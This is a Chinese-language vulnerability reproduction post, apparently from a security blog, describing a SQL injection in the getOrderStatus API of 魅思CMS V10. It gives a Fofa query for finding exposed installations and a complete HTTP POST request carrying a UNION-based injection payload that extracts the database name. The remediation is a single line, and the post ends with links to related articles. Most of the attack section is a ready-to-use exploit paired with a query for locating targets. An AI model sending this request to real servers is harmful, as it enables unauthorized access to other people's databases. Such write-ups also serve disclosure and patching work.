魅思CMS getOrderStatus SQL注入漏洞复现

0x01 漏洞描述:

魅思是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。

在位于 /controller/Api.php 控制器中的getOrderStatus 方法传入后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生。

0x02 影响版本:

魅思 V10

0x03 搜索语句:

Fofa:app="魅思-视频管理系统"

0x04 漏洞复现:

复制代码
POST /api/getOrderStatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(database() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

0x05 修复建议:

使用预编译语句并对键入的特殊字符进行编码。

相关推荐
神经毒素8 分钟前
WEB安全--Java安全--shiro550反序列化漏洞
java·安全·web安全·shiro
mooyuan天天1 小时前
SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法
数据库·web安全·sql注入·dvwa靶场·sql报错
一口一个橘子1 小时前
[ctfshow web入门] web77
前端·web安全·网络安全
阿斯顿法国红酒快2 小时前
Windows系统安全加固
网络·windows·安全·网络安全·系统安全·ddos
一口一个橘子3 小时前
[ctfshow web入门] web118
前端·web安全·网络安全
kp000004 小时前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
Hello.Reader6 小时前
EDR与XDR如何选择适合您的网络安全解决方案
安全·web安全
cooldream20096 小时前
信息安全的基石:深入理解五大核心安全服务
数据库·安全·系统架构师
观测云6 小时前
观测云产品更新 | 安全监测、事件中心、仪表板AI智能分析等
人工智能·安全
AIGC方案6 小时前
2025 AI如何重构网络安全产品
人工智能·web安全·重构